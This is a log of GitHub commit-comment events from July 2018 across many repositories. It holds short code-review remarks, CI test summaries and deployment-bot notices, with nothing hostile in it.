{"id":"8030763398","type":"CommitCommentEvent","actor":{"login":"cdavis4"},"repo":{"name":"cdavis4/Group4_Project"},"payload":{"comment":{"id":29863943,"position":null,"line":null,"path":null,"commit_id":"748b371f407571ece3eafbafd97bd9ce64a34321","created_at":"2018-07-27T20:57:34Z","updated_at":"2018-07-27T20:57:34Z","author_association":"OWNER","body":"Is moveCount to check to see if critter has tried different directions? Step counter?  Survive was intended to be a step counter so bug would know when it could breed."}},"created_at":"2018-07-27T20:57:34Z"}
{"id":"8030766172","type":"CommitCommentEvent","actor":{"login":"jeffrom"},"repo":{"name":"evmar/j8t"},"payload":{"comment":{"id":29863946,"position":10,"line":105,"path":"src/bind.rs","commit_id":"2744cd8f00506e5ed7668a2564c3c1ec20051e7d","created_at":"2018-07-27T20:58:16Z","updated_at":"2018-07-27T20:58:16Z","author_association":"NONE","body":"hmm i think you should use a different language. i think rust is more of a fad."}},"created_at":"2018-07-27T20:58:16Z"}
{"id":"8030770119","type":"CommitCommentEvent","actor":{"login":"Vishnuvyusa"},"repo":{"name":"Vishnuvyusa/vishnuvy"},"payload":{"comment":{"id":29863959,"position":null,"line":null,"path":null,"commit_id":"9319e01e02159d83d27db41e14e7032c40f981bf","created_at":"2018-07-27T20:59:12Z","updated_at":"2018-07-27T20:59:12Z","author_association":"OWNER","body":"hi code is not written"}},"created_at":"2018-07-27T20:59:12Z"}
{"id":"8030773210","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29863965,"position":null,"line":null,"path":null,"commit_id":"0c9c1208cc23bab862638ac36af4eec8a9c3b27e","created_at":"2018-07-27T20:59:56Z","updated_at":"2018-07-27T20:59:56Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-buildfix](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-buildfix).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-buildfix-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-27T20:59:56Z"}
{"id":"8030773661","type":"CommitCommentEvent","actor":{"login":"fs-tom"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29863967,"position":null,"line":null,"path":null,"commit_id":"38e0d36b74074324978ba917821f211d927b07ae","created_at":"2018-07-27T21:00:01Z","updated_at":"2018-07-27T21:00:01Z","author_association":"MEMBER","body":"@mpavlak1 @fs-craig \r\nYou're adding stuff to demand builder that's not related to demand builder to address a problem with a script that's unrelated (the sha-1 stuff).  I'd say fork that stuff off to a separate project/script and leave DB alone.\r\n\r\nAlso be careful of hardwiring in paths to network resources in public repos.  It doesn't matter here, but could for other things..."}},"created_at":"2018-07-27T21:00:01Z"}
{"id":"8030778618","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29863984,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T21:01:08Z","updated_at":"2018-07-27T21:01:08Z","author_association":"COLLABORATOR","body":"This happens on master though. Let me come up with a minimal reproducible example."}},"created_at":"2018-07-27T21:01:08Z"}
{"id":"8030782635","type":"CommitCommentEvent","actor":{"login":"jeffrom"},"repo":{"name":"compoterhacker/mehrai"},"payload":{"comment":{"id":29864003,"position":5,"line":11,"path":"Dockerfile","commit_id":"4ab3362731969f5bb845a84deaed795ae0b76ea0","created_at":"2018-07-27T21:02:08Z","updated_at":"2018-07-27T21:02:08Z","author_association":"NONE","body":"I MISS YOU"}},"created_at":"2018-07-27T21:02:08Z"}
{"id":"8030788681","type":"CommitCommentEvent","actor":{"login":"AlanZhang2002"},"repo":{"name":"JasonLiu2002/Summer-Camp-2018-Counselor"},"payload":{"comment":{"id":29864010,"position":null,"line":null,"path":null,"commit_id":"a027a379cf4bc1ef019ec924169a637b99079b7a","created_at":"2018-07-27T21:03:39Z","updated_at":"2018-07-27T21:03:39Z","author_association":"NONE","body":"no"}},"created_at":"2018-07-27T21:03:39Z"}
{"id":"8030792962","type":"CommitCommentEvent","actor":{"login":"tessajean"},"repo":{"name":"DDS-Lab/disaster-damage-detection"},"payload":{"comment":{"id":29864016,"position":null,"line":null,"path":null,"commit_id":"1f8adc8eedfc59fa367d4500870ae0a34a9f250a","created_at":"2018-07-27T21:04:42Z","updated_at":"2018-07-27T21:04:42Z","author_association":"COLLABORATOR","body":"removed relative-permalink"}},"created_at":"2018-07-27T21:04:42Z"}
{"id":"8030793150","type":"CommitCommentEvent","actor":{"login":"peter-hawthorne"},"repo":{"name":"hawthorne-git/hawthorne-admin"},"payload":{"comment":{"id":29864017,"position":null,"line":null,"path":null,"commit_id":"73ab34a0c5857e3022d68b70d773002cad102697","created_at":"2018-07-27T21:04:45Z","updated_at":"2018-07-27T21:04:45Z","author_association":"CONTRIBUTOR","body":"Is email address data being preserved as entered? On the rare (I still run into it) occasion a customer is using an email address with case sensitivity, then Customer@domain.com would be different from customer@domain.com\r\n\r\nCommonName@domain.com and commonname@domain.com would be flagged as already having a user account."}},"created_at":"2018-07-27T21:04:45Z"}
{"id":"8030805946","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":29864040,"position":22,"line":420,"path":"src/pal/src/thread/thread.cpp","commit_id":"f076ba2aa951c360def8d35d53d6a4a390e52038","created_at":"2018-07-27T21:07:56Z","updated_at":"2018-07-27T21:07:56Z","author_association":"MEMBER","body":"This returns process-local pthread id. The Windows equivalent of this thread id would be `NtCurrentTeb()`.\r\n\r\nThe actual OS thread id (the one that kernel know about) would would be the one returned by `gettid` on Unix and `pthread_threadid_np` on OSX."}},"created_at":"2018-07-27T21:07:56Z"}
{"id":"8030806148","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864042,"position":null,"line":null,"path":null,"commit_id":"be848eff013c959e0eefed9511197efc2da77d27","created_at":"2018-07-27T21:07:59Z","updated_at":"2018-07-27T21:07:59Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - Win64-Windows-7-VisualStudio-14: OK (2952 of 2956 tests passed, 0 test warnings)\n\nMessages:\n\n * 4 tests had: EIO diffs.\n * 4 tests had: ESO big diffs.\n * 4 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 619\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be848eff013c959e0eefed9511197efc2da77d27-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.86%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T21:07:59Z"}
{"id":"8030808309","type":"CommitCommentEvent","actor":{"login":"charles-wangkai"},"repo":{"name":"rajendrajalal/hackerrank-3"},"payload":{"comment":{"id":29864046,"position":null,"line":null,"path":null,"commit_id":"31b0bc9d01f8151cef8378e344eb945633f4412e","created_at":"2018-07-27T21:08:33Z","updated_at":"2018-07-27T21:08:33Z","author_association":"NONE","body":"Yes, the initial code template changed by removing the \"main structure\" part. After remove that part, the rest of same code can pass all the test cases now. (Refer to https://github.com/charles-wangkai/hackerrank/commit/0239d0ec33445e0581a8ed84625ecd5f519ff384)"}},"created_at":"2018-07-27T21:08:33Z"}
{"id":"8030831843","type":"CommitCommentEvent","actor":{"login":"elizabeth-bremer"},"repo":{"name":"elizabeth-bremer/un-modelling.github.io"},"payload":{"comment":{"id":29864101,"position":null,"line":null,"path":null,"commit_id":"db629a6796dc64a0c084667d6bd7f32e237e1c69","created_at":"2018-07-27T21:14:41Z","updated_at":"2018-07-27T21:14:41Z","author_association":"OWNER","body":"[2. Universal Access to Electricity - Reader ToC.pdf](https://github.com/elizabeth-bremer/un-modelling.github.io/files/2237255/2.Universal.Access.to.Electricity.-.Reader.ToC.pdf)\r\n"}},"created_at":"2018-07-27T21:14:41Z"}
{"id":"8030832447","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29864103,"position":null,"line":null,"path":null,"commit_id":"126bfb9212e01908676f0c323eee7c3def44ee23","created_at":"2018-07-27T21:14:50Z","updated_at":"2018-07-27T21:14:50Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/126bfb9212e01908676f0c323eee7c3def44ee23/index.html"}},"created_at":"2018-07-27T21:14:50Z"}
{"id":"8030832892","type":"CommitCommentEvent","actor":{"login":"AbdelrahmanHafez"},"repo":{"name":"Automattic/mongoose"},"payload":{"comment":{"id":29864109,"position":null,"line":null,"path":null,"commit_id":"559ae4ef338b4f0b1a4815c388792169eb1bff25","created_at":"2018-07-27T21:14:57Z","updated_at":"2018-07-27T21:14:57Z","author_association":"CONTRIBUTOR","body":"The performance effect for developers who run Windows is hidden in between the lines, perhaps add a standalone note for this and link to the issue for _more info_?"}},"created_at":"2018-07-27T21:14:57Z"}
{"id":"8030833743","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29864113,"position":null,"line":null,"path":null,"commit_id":"2681f77bc86c117e66e7988a134181319a89bb3e","created_at":"2018-07-27T21:15:12Z","updated_at":"2018-07-27T21:15:12Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-39-greene-space.pantheonsite.io/)\n\nCreated multidev environment [ci-39](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#ci-39) for greene-space."}},"created_at":"2018-07-27T21:15:12Z"}
{"id":"8030839510","type":"CommitCommentEvent","actor":{"login":"elizabeth-bremer"},"repo":{"name":"elizabeth-bremer/un-modelling.github.io"},"payload":{"comment":{"id":29864132,"position":null,"line":null,"path":null,"commit_id":"395b6eb1f3cc5cf4af19a8a840acb672472195b6","created_at":"2018-07-27T21:16:45Z","updated_at":"2018-07-27T21:16:45Z","author_association":"OWNER","body":"[2. Energy_Systems - Reader ToC.pdf](https://github.com/elizabeth-bremer/un-modelling.github.io/files/2237260/2.Energy_Systems.-.Reader.ToC.pdf)\r\n"}},"created_at":"2018-07-27T21:16:45Z"}
{"id":"8030843230","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29864141,"position":71,"line":132,"path":"local-cli/core/index.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-27T21:17:45Z","updated_at":"2018-07-27T21:17:45Z","author_association":"COLLABORATOR","body":"@Compulves This crashes when the config option is not passed to the CLI (this is the default for OSS).\r\n\r\nI’m also having issues with my custom rn-cli.config.js, the file gets parsed but seems like none of the method gets called, did the format change? We will want to document this."}},"created_at":"2018-07-27T21:17:45Z"}
{"id":"8030843564","type":"CommitCommentEvent","actor":{"login":"m1yag1"},"repo":{"name":"openstax/cnx-automation"},"payload":{"comment":{"id":29864142,"position":15,"line":940,"path":"tests/webview/ui/test_content.py","commit_id":"4bead7a571e33da36aa038644c759c7206e174d1","created_at":"2018-07-27T21:17:51Z","updated_at":"2018-07-27T21:17:51Z","author_association":"COLLABORATOR","body":"change to click_title_link()"}},"created_at":"2018-07-27T21:17:51Z"}
{"id":"8030848205","type":"CommitCommentEvent","actor":{"login":"peter279k"},"repo":{"name":"dframe/dframe"},"payload":{"comment":{"id":29864149,"position":13,"line":27,"path":"src/Session.php","commit_id":"d24de9832e4fe92aaa329ad1d32442f74d8ecf32","created_at":"2018-07-27T21:19:06Z","updated_at":"2018-07-27T21:19:06Z","author_association":"CONTRIBUTOR","body":"The `empty` seems to be equals to `!isset`.\r\nI think it's better than using `!isset` because of consistency.\r\nWhat do you think, @dusta ?"}},"created_at":"2018-07-27T21:19:06Z"}
{"id":"8030851170","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29864155,"position":71,"line":132,"path":"local-cli/core/index.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-27T21:19:54Z","updated_at":"2018-07-27T21:19:54Z","author_association":"COLLABORATOR","body":"Cc @CompuIves @rafeca "}},"created_at":"2018-07-27T21:19:54Z"}
{"id":"8030856060","type":"CommitCommentEvent","actor":{"login":"vineetjohn"},"repo":{"name":"vineetjohn/linguistic-style-transfer"},"payload":{"comment":{"id":29864164,"position":null,"line":null,"path":null,"commit_id":"91fc0f4c0b98ed138d0bdec9529b288f6dfcad72","created_at":"2018-07-27T21:21:11Z","updated_at":"2018-07-27T21:21:11Z","author_association":"OWNER","body":"Addresses #58 "}},"created_at":"2018-07-27T21:21:11Z"}
{"id":"8030856100","type":"CommitCommentEvent","actor":{"login":"m1yag1"},"repo":{"name":"openstax/cnx-automation"},"payload":{"comment":{"id":29864165,"position":14,"line":408,"path":"pages/webview/content.py","commit_id":"4bead7a571e33da36aa038644c759c7206e174d1","created_at":"2018-07-27T21:21:12Z","updated_at":"2018-07-27T21:21:12Z","author_association":"COLLABORATOR","body":"change to `active_page_color`"}},"created_at":"2018-07-27T21:21:12Z"}
{"id":"8030856877","type":"CommitCommentEvent","actor":{"login":"josephnunn"},"repo":{"name":"zmap/zmap"},"payload":{"comment":{"id":29864167,"position":null,"line":null,"path":null,"commit_id":"5e4143973dc71207f087005ee0891b2c86499eae","created_at":"2018-07-27T21:21:25Z","updated_at":"2018-07-27T21:21:25Z","author_association":"NONE","body":"This also helped me"}},"created_at":"2018-07-27T21:21:25Z"}
{"id":"8030858685","type":"CommitCommentEvent","actor":{"login":"m1yag1"},"repo":{"name":"openstax/cnx-automation"},"payload":{"comment":{"id":29864175,"position":15,"line":409,"path":"pages/webview/content.py","commit_id":"4bead7a571e33da36aa038644c759c7206e174d1","created_at":"2018-07-27T21:21:55Z","updated_at":"2018-07-27T21:21:55Z","author_association":"COLLABORATOR","body":"we try to avoid back slashes, you should be able to wrap this in parens to break into multiple lines."}},"created_at":"2018-07-27T21:21:55Z"}
{"id":"8030859939","type":"CommitCommentEvent","actor":{"login":"m1yag1"},"repo":{"name":"openstax/cnx-automation"},"payload":{"comment":{"id":29864176,"position":5,"line":75,"path":"pages/webview/content_page.py","commit_id":"4bead7a571e33da36aa038644c759c7206e174d1","created_at":"2018-07-27T21:22:16Z","updated_at":"2018-07-27T21:22:16Z","author_association":"COLLABORATOR","body":"change to click_title_link"}},"created_at":"2018-07-27T21:22:16Z"}
{"id":"8030863791","type":"CommitCommentEvent","actor":{"login":"m1yag1"},"repo":{"name":"openstax/cnx-automation"},"payload":{"comment":{"id":29864183,"position":25,"line":947,"path":"tests/webview/ui/test_content.py","commit_id":"4bead7a571e33da36aa038644c759c7206e174d1","created_at":"2018-07-27T21:23:20Z","updated_at":"2018-07-27T21:23:20Z","author_association":"COLLABORATOR","body":"`active_color = content.header_nav.table_of_contents.highlight_page_color`\r\n`assert active_color == highlight_color`"}},"created_at":"2018-07-27T21:23:20Z"}
{"id":"8030893586","type":"CommitCommentEvent","actor":{"login":"thomashoneyman"},"repo":{"name":"thomashoneyman/purescript-halogen-formless"},"payload":{"comment":{"id":29864255,"position":null,"line":null,"path":null,"commit_id":"734eab8f1bd6c9512de4a481701f84077202c6db","created_at":"2018-07-27T21:31:17Z","updated_at":"2018-07-27T21:31:17Z","author_association":"OWNER","body":"If the idea here is to stop relying on symbol proxies everywhere in favor of generating lenses (which I'm not confident is a better solution -- it's at least as magical and more complex for end users IMO) then I'll need to remove the `setInput` functions and find another way to work with a user-provided lens to construct the functions so they work as required (update a field and also update its touched / result fields)"}},"created_at":"2018-07-27T21:31:17Z"}
{"id":"8030901213","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29864278,"position":null,"line":null,"path":null,"commit_id":"362de23c3ec16093ec7a6d2d9c55e66b2b929db6","created_at":"2018-07-27T21:33:20Z","updated_at":"2018-07-27T21:33:20Z","author_association":"MEMBER","body":"You can use \"git commit -S -m\" for all your commits to show them verified :)"}},"created_at":"2018-07-27T21:33:20Z"}
{"id":"8030903135","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"GoogleChromeLabs/ndb"},"payload":{"comment":{"id":29864284,"position":12,"line":223,"path":"front_end/ndb/NdbMain.js","commit_id":"a0e79018f9b31494b668c37453d3806e54b1a018","created_at":"2018-07-27T21:33:53Z","updated_at":"2018-07-27T21:33:53Z","author_association":"NONE","body":"👆 Is the area above where things like `node -r foo` should be forwarded too? Many folks use loaders like `@babel/register` or `esm`.  Instead of hardcoding `--experimental-modules` could you instead see which flags or `--require`'s were passed to the initial `ndb node <flags> ./file` command?"}},"created_at":"2018-07-27T21:33:53Z"}
{"id":"8030904849","type":"CommitCommentEvent","actor":{"login":"tanertas"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29864290,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-27T21:34:20Z","updated_at":"2018-07-27T21:34:20Z","author_association":"CONTRIBUTOR","body":"This is consecutive 17th commit on one single package so far. Wouldn't it be better to use own clone of repo before finalizing our work?"}},"created_at":"2018-07-27T21:34:20Z"}
{"id":"8030908031","type":"CommitCommentEvent","actor":{"login":"nedtwigg"},"repo":{"name":"mytakedotorg/mytakedotorg"},"payload":{"comment":{"id":29864300,"position":null,"line":null,"path":null,"commit_id":"3fe3209cedd500ac3ddbf0c2e619522a314c7f6b","created_at":"2018-07-27T21:35:13Z","updated_at":"2018-07-27T21:35:13Z","author_association":"COLLABORATOR","body":"We *can* do this on the server, but it's probably better to do it in node.  The path is: parse foundation-index-hash to find the index, parse the index, iterate over the facts to find the one with a matching title.  I believe we already do this on the client in a few places."}},"created_at":"2018-07-27T21:35:13Z"}
{"id":"8030908346","type":"CommitCommentEvent","actor":{"login":"sophz55"},"repo":{"name":"SoWhat3/CampusJobs"},"payload":{"comment":{"id":29864302,"position":null,"line":null,"path":null,"commit_id":"e845e323a3b82d0b92f0149ee300349e0dfc50e0","created_at":"2018-07-27T21:35:18Z","updated_at":"2018-07-27T21:35:18Z","author_association":"CONTRIBUTOR","body":"closes #18 "}},"created_at":"2018-07-27T21:35:18Z"}
{"id":"8030911270","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29864312,"position":null,"line":null,"path":null,"commit_id":"fd38569fa7be50f0cddc03d6d77c19ec33bfa0c8","created_at":"2018-07-27T21:36:06Z","updated_at":"2018-07-27T21:36:06Z","author_association":"COLLABORATOR","body":"Changes can be seen in 7b0a37d."}},"created_at":"2018-07-27T21:36:06Z"}
{"id":"8030911690","type":"CommitCommentEvent","actor":{"login":"sophz55"},"repo":{"name":"SoWhat3/CampusJobs"},"payload":{"comment":{"id":29864314,"position":null,"line":null,"path":null,"commit_id":"ba9a3e9b1a1601d0d0fec31156011a485c4c68b2","created_at":"2018-07-27T21:36:12Z","updated_at":"2018-07-27T21:36:12Z","author_association":"CONTRIBUTOR","body":"#16 "}},"created_at":"2018-07-27T21:36:12Z"}
{"id":"8030916047","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29864320,"position":null,"line":null,"path":null,"commit_id":"f2e5b5a8fb4d7aa78013e2d6da6b3bbff98be549","created_at":"2018-07-27T21:37:28Z","updated_at":"2018-07-27T21:37:28Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/f2e5b5a8fb4d7aa78013e2d6da6b3bbff98be549/index.html"}},"created_at":"2018-07-27T21:37:28Z"}
{"id":"8030917547","type":"CommitCommentEvent","actor":{"login":"petrelharp"},"repo":{"name":"petrelharp/treestats_ms"},"payload":{"comment":{"id":29864323,"position":4,"line":4,"path":"treestats/weighted_trees.py","commit_id":"ecd736be9e3baf4f2e3419395905cbb40e95d097","created_at":"2018-07-27T21:37:53Z","updated_at":"2018-07-27T21:37:53Z","author_association":"OWNER","body":"FYI, @jeromekelleher - I wrote this because @jgallowa07 needs it for a different project. This generalizes the basic operation of `num_tracked_samples` in two ways, by allowing weights, and allowing `node_fun` to be something other than `sum`. "}},"created_at":"2018-07-27T21:37:53Z"}
{"id":"8030919367","type":"CommitCommentEvent","actor":{"login":"JTatum95"},"repo":{"name":"wc-library/bibtable"},"payload":{"comment":{"id":29864326,"position":null,"line":null,"path":null,"commit_id":"e40915f7d673d3f3936ea7a5790f6bc163b12de2","created_at":"2018-07-27T21:38:26Z","updated_at":"2018-07-27T21:38:26Z","author_association":"NONE","body":"Fix previous merge issues."}},"created_at":"2018-07-27T21:38:26Z"}
{"id":"8030919408","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29864327,"position":null,"line":null,"path":null,"commit_id":"362de23c3ec16093ec7a6d2d9c55e66b2b929db6","created_at":"2018-07-27T21:38:27Z","updated_at":"2018-07-27T21:38:27Z","author_association":"MEMBER","body":"@persianpros I've set `gpgsign = true` which should sign all my commits without the -S parameter on my local copy of pli-extras but I forgot to enable it for meta-amlogic."}},"created_at":"2018-07-27T21:38:27Z"}
{"id":"8030927427","type":"CommitCommentEvent","actor":{"login":"johncapital1consultants"},"repo":{"name":"MicrosoftDocs/windows-itpro-docs"},"payload":{"comment":{"id":29864335,"position":null,"line":null,"path":null,"commit_id":"47a700c04474abde0600a393bdc49c75ea87a0b7","created_at":"2018-07-27T21:40:39Z","updated_at":"2018-07-27T21:40:39Z","author_association":"NONE","body":"Well personally being the owner of a company and kind of being a one-man show I don’t have a choice but to work late at night"}},"created_at":"2018-07-27T21:40:39Z"}
{"id":"8030929423","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864336,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T21:41:07Z","updated_at":"2018-07-27T21:41:07Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2916 of 2948 tests passed, 173 test warnings)\n\nMessages:\n\n * 172 tests had: ESO small diffs.\n * 166 tests had: EIO diffs.\n * 107 tests had: Table small diffs.\n * 130 tests had: MTR small diffs.\n * 28 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 27 tests had: Table big diffs.\n * 8 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\nregression Test Summary\n * Passed: 594\n * Failed: 30\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.91%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T21:41:07Z"}
{"id":"8030930568","type":"CommitCommentEvent","actor":{"login":"johncapital1consultants"},"repo":{"name":"MicrosoftDocs/windows-itpro-docs"},"payload":{"comment":{"id":29864340,"position":null,"line":null,"path":null,"commit_id":"47a700c04474abde0600a393bdc49c75ea87a0b7","created_at":"2018-07-27T21:41:26Z","updated_at":"2018-07-27T21:41:26Z","author_association":"NONE","body":"And to be honest with you I’ve been getting hacked I have police reports all this happened since February 5 so if you like I’ll be more than happy to post all my hack in my police reports my stolen identity that’s being caused by all this mess"}},"created_at":"2018-07-27T21:41:26Z"}
{"id":"8030931130","type":"CommitCommentEvent","actor":{"login":"cjcruzrivera"},"repo":{"name":"sistemasases/moduloases"},"payload":{"comment":{"id":29864343,"position":38,"line":347,"path":"managers/lib/student_lib.php","commit_id":"d873d244c382f69e7f18747b2208394fd5c5cea8","created_at":"2018-07-27T21:41:37Z","updated_at":"2018-07-27T21:41:37Z","author_association":"COLLABORATOR","body":"Esto no debería esta comentado? @iaderegg "}},"created_at":"2018-07-27T21:41:37Z"}
{"id":"8030932262","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"Re-Dream/darkrpmodification"},"payload":{"comment":{"id":29864346,"position":null,"line":null,"path":null,"commit_id":"c672e4d991eb841f95132675f3f15939ae21b0aa","created_at":"2018-07-27T21:41:57Z","updated_at":"2018-07-27T21:41:57Z","author_association":"NONE","body":"Dont remove custom moneyprinter, already disabled"}},"created_at":"2018-07-27T21:41:57Z"}
{"id":"8030934419","type":"CommitCommentEvent","actor":{"login":"johan"},"repo":{"name":"whatwg/dom"},"payload":{"comment":{"id":29864353,"position":21,"line":9303,"path":"dom.bs","commit_id":"826d66b551935a7b2af09a4afc2b839500bb6c0e","created_at":"2018-07-27T21:42:35Z","updated_at":"2018-07-27T21:42:35Z","author_association":"NONE","body":"[This whole `while` loop](https://github.com/whatwg/dom/blob/master/dom.bs#L9363-L9372) is a no-op unless we change this `then` clause to something like `then set <var>node</var> to <var>temporary</var> and <a for=iteration>break</a>.`"}},"created_at":"2018-07-27T21:42:35Z"}
{"id":"8030946461","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29864386,"position":null,"line":null,"path":null,"commit_id":"ecf98253c3bce8d6a21049d09badb0cefb1d9a77","created_at":"2018-07-27T21:46:05Z","updated_at":"2018-07-27T21:46:05Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1020](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1020).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1020-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T21:46:05Z"}
{"id":"8030954774","type":"CommitCommentEvent","actor":{"login":"DigitalEntry"},"repo":{"name":"rem-official/rem-official.github.io"},"payload":{"comment":{"id":29864400,"position":null,"line":null,"path":null,"commit_id":"8abe5d3fd2a67e3ceb8fb507baf6c21f89b739b9","created_at":"2018-07-27T21:48:37Z","updated_at":"2018-07-27T21:48:37Z","author_association":"MEMBER","body":"@UnholyRazzberry Be less fucking stupid next time, k thx <3"}},"created_at":"2018-07-27T21:48:37Z"}
{"id":"8030958328","type":"CommitCommentEvent","actor":{"login":"jusfreeman"},"repo":{"name":"agileware/au.com.agileware.ewayrecurring"},"payload":{"comment":{"id":29864417,"position":430,"line":317,"path":"au_com_agileware_ewayrecurring.class.php","commit_id":"c371709b847bc39ddf371e2031c4029ace941448","created_at":"2018-07-27T21:49:41Z","updated_at":"2018-07-27T21:49:41Z","author_association":"CONTRIBUTOR","body":"Spelling error, \"first\""}},"created_at":"2018-07-27T21:49:41Z"}
{"id":"8030960210","type":"CommitCommentEvent","actor":{"login":"jusfreeman"},"repo":{"name":"agileware/au.com.agileware.ewayrecurring"},"payload":{"comment":{"id":29864423,"position":493,"line":339,"path":"au_com_agileware_ewayrecurring.class.php","commit_id":"c371709b847bc39ddf371e2031c4029ace941448","created_at":"2018-07-27T21:50:14Z","updated_at":"2018-07-27T21:50:14Z","author_association":"CONTRIBUTOR","body":"Change \"duplication\" to \"duplicate\""}},"created_at":"2018-07-27T21:50:14Z"}
{"id":"8030963818","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29864430,"position":null,"line":null,"path":null,"commit_id":"da8d5a9e7ed471eb25a26db04a68b180d6a1d86d","created_at":"2018-07-27T21:51:17Z","updated_at":"2018-07-27T21:51:17Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newplanfa](https://newplanfa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/new-plans-faq](https://newplanfa-static-docs.pantheonsite.io/docs/new-plans-faq)\n- [/docs/site-plan](https://newplanfa-static-docs.pantheonsite.io/docs/site-plan)\n"}},"created_at":"2018-07-27T21:51:17Z"}
{"id":"8030966611","type":"CommitCommentEvent","actor":{"login":"jusfreeman"},"repo":{"name":"agileware/au.com.agileware.ewayrecurring"},"payload":{"comment":{"id":29864438,"position":4,"line":76,"path":"au_com_agileware_ewayrecurring.class.php","commit_id":"c371709b847bc39ddf371e2031c4029ace941448","created_at":"2018-07-27T21:52:08Z","updated_at":"2018-07-27T21:52:08Z","author_association":"CONTRIBUTOR","body":"These API libraries should be removed, no longer required"}},"created_at":"2018-07-27T21:52:08Z"}
